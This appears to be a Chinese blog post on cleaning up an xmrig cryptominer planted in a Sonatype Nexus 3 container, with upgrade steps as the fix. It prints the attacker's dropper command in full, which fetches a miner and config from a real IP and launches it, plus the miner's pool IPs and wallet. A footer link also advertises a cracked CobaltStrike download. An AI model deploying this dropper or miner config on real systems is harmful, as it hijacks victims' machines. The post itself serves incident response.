发现被执行的程序在xmrig在 /var/tmp/目录下 ,脚本文件内容为以下:

curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &

config.json内容如下:

{

    "algo": "cryptonight",

    "api": {

        "port": ,

        "access-token": null,

        "id": null,

        "worker-id": null,

        "ipv6": false,

        "restricted": true

    },

    "asm": true,

    "autosave": true,

    "av": ,

    "background": true,

    "colors": true,

    "cpu-affinity": null,

    "cpu-priority": ,

    "donate-level": ,

    "huge-pages": true,

    "hw-aes": null,

    "log-file": null,

    "max-cpu-usage": ,

    "pools": [

        {

            "url": "202.144.193.8:80",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        },

        {

            "url": "185.161.70.34:3333",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        },

        {

            "url": "202.144.193.110:3333",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        },

        {

            "url": "205.185.122.99:3333",

            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": true,

            "variant": -,

            "tls": false,

            "tls-fingerprint": null

        }

    ],

    "print-time": ,

    "retries": ,

    "retry-pause": ,

    "safe": false,

    "threads": {

        "cn": [

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            },

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            }

        ],

        "cn-lite": [

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            },

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            }

        ],

        "cn-heavy": [

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            },

            {

                "low_power_mode": ,

                "affine_to_cpu": false,

                "asm": true

            }

        ]

    },

    "algo-perf": {

        "cn": 2.0,

        "cn/2": 2.0,

        "cn/msr": 2.0,

        "cn-lite": 2.0,

        "cn-heavy": 2.0

    },

    "calibrate-algo": false,

    "calibrate-algo-time": ,

    "user-agent": null,

    "syslog": false,

    "watch": false

}

还有一个可 执行的程序

xrmrig,此程序会 导致cpu爆满

删除容器/var/tmp/目录下的文件,或者直接删除容器(当心数据丢失)然后把程序升级  ,用docker安装的升级如下:

docker pull docker.io/sonatype/nexus3 //会自动拉取最新版本

docker run -d -p : -p : --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3

Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞的更多相关文章

  1. struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复

          Struts2 被发现存在新的高危远程代码执行漏洞,可造成服务器被入侵,只要是Struts2版本 低于 2.3.14.3 全部存在此漏洞.目前官方已经发布了最新的版本进行修复.请将stru ...

  2. vBulletin 5.x 版本通杀远程代码执行漏洞复现

    漏洞介绍 vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码.未经验证的恶意访问者可通过向index.php发出包含 rout ...

  3. Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞分析和复现

    0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库.其3.14.0及之前版本中,存在一处基于OrientDB自 ...

  4. Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现

    0x00 漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库.其3.14.0及之前版本中,存在一处基于OrientDB自 ...

  5. ThinkPHP5 远程代码执行漏洞被入侵日志,升级最新版本解决

    2018年12月9日,ThinkPHP团队发布了一个补丁更新,修复了一处由于路由解析缺陷导致的代码执行漏洞.该漏洞危害程度非常高,默认环境配置即可导致远程代码执行.经过启明星辰ADLab安全研究员对T ...

  6. Sonatype Nexus Repository Manager修改密码不成功

    nexus修改用户密码时出现Invalid authentication ticket 搜索一下,说会修改密码操作要在15秒内完成 ,于是快速操作,没想到真成功了

  7. Sonatype Nexus Repository Manager清除无用的docker镜像

    1.创建定时任务 2.先run一下看是否能删除无用镜像

  8. ECShop全系列版本远程代码执行漏洞复现

    前言 问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行 漏洞分析 0x01-SQL注入 先看user.php $back_act变量来源于HTTP_R ...

  9. 威胁快报|Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复

    背景 近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件. 值得注意的是, ...

随机推荐

  1. Linux工作环境:CentOS7最小安装+Xfce桌面环境

    ref: https://blog.csdn.net/smstong/article/details/44802989 3.1 执行CentOS7 最小安装去官网下载CentOS-7.0-1406-x ...

  2. CobaltStrike3.12/13 破解

    更新3.13破解版 链接: https://pan.baidu.com/s/14e0tpVPzUhiAhYU2_jvBag 提取码: d9uf MacOS客户端: 链接: https://pan.ba ...

  3. idea当配置eclipse快捷键时,全局替换的快捷键是什么?

    简介   每次为了新版本新建一个分支的时候,都要改每个maven的版本号,好麻烦,有么有?如下图: 当idea配置eclipse快捷键时,默认是没有全局替换快捷键的,需要设置 步骤 首先打开setti ...

  4. linux下反编译android apk

    1.所需要的工具 1)apktool,功能:反编译出apk所需要的资源文件和布局设置文件等, 下载地址:https://code.google.com/p/android-apktool/downlo ...

  5. Dubbo 在maven项目中的应用

    首先我们来看一下dubbo的架构: 所以通过此图,我们看到就是服务的提供者将服务注册到注册中心,服务的消费者从注册中心获取服务,monitor监控服务的调用. 关于dubbo的使用,我们举个简单的例子 ...

  6. halcon 动态阈值分割之偏移值

  7. Linux使用命令修改默认启动为图形或字符界面

    因为要在Linux系统上装NVIDIA显卡驱动,默认重启必须是字符界面,因此把这块所需命令记录下来. 1,先查看当前系统默认启动的界面 systemctl get-default 2,修改默认启动界面 ...

  8. Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.8.0:compile (default-compile) on project demo: Fatal error com piling: 无效的标记: -parameters

    背景:本项目使用JDK1.8 编译maven工程的时候出现如下错误: Failed to execute goal org.apache.maven.plugins:maven-compiler-pl ...

  9. Vue之初识Vue

    前言 如果你之前已经习惯了用jQuery操作DOM,学习Vue.js时请先抛开手动操作DOM的思维, 因为Vue.js是数据驱动的,你无需手动操作DOM.它通过一些特殊的HTML语法,将DOM和 数据 ...

  10. Redis 数据结构的实现

    Redis 数据结构的实现 先看个对照关系: Redis数据结构 实现一 实现二 string 整数(如果value能够表示为整数) 字符串 hash 压缩列表(只包含少量键值对, 并且每个键值对的键 ...